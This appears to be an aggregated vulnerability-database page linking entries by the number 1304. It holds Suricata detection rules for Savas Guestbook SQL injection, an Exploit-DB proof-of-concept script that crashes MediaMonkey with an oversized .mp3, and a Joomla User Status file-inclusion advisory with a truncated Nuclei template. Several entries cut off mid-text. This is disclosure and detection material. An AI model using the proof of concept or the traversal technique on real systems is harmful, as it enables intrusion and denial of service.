Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message INSERT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"message="; nocase; content:"INSERT"; nocase; pcre:"/INSERT.+INTO/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004519; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message ASCII
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message ASCII
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message ASCII"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"message="; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004521; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website ASCII
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website ASCII
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website ASCII"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"website="; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004515; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Exploit-DB
MediaMonkey 3.2.4.1304 - '.mp3' Buffer Overflow (PoC)
exploitdb·2010-12-04
MediaMonkey 3.2.4.1304 - '.mp3' Buffer Overflow (PoC)
MediaMonkey 3.2.4.1304 - '.mp3' Buffer Overflow (PoC)
---
# Exploit Title: Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerability PoC
# Date: 12/04/2010
# Author: 0v3r
# Software Link: http://www.mediamonkey.com/download/?dir=download
# Version: 3.2.4.1304
# Tested on: Windows XP SP3 EN
# CVE: N/A
#!/usr/bin/python
buff = "\x41" * 5000
try:
f = open("exploit.mp3",'w')
f.write(buff)
f.close()
print "[-] File created!\n"
except:
print "[-] Error occured!\n"
Exploit-DB
Joomla! Component User Status - Local File Inclusion
exploitdb·2010-04-01
CVE-2010-1304 Joomla! Component User Status - Local File Inclusion
Joomla! Component User Status - Local File Inclusion
---
Joomla Component User Status Local File Inclusion
Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : [email protected]
Date : 31 March 2010
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : User Status
version : 1.21.16
Developer : Mo Kelly
License : GPL type : Commercial
Price : 10.00 USD
Date Added : 27 March 2010
Download : http://joomlamo.com/joomlamo/downloads/cat_view/6-other-joomla-components-modules-and-plugins.html
Description :
The component back end allows the entry of locations. Also assigning users to a location is done in the back end.
Users that are not assigned a location do not show up in t
Nuclei
Joomla! Component User Status - Local File Inclusion
nuclei·CVSS 5.0
CVE-2010-1304 [MEDIUM] Joomla! Component User Status - Local File Inclusion
Joomla! Component User Status - Local File Inclusion
A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1304
info:
name: Joomla! Component User Status - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Unauthenticated attackers can read arbitrary files on the server through directory traversal in the controller parameter of the User S
2010-04-08
Published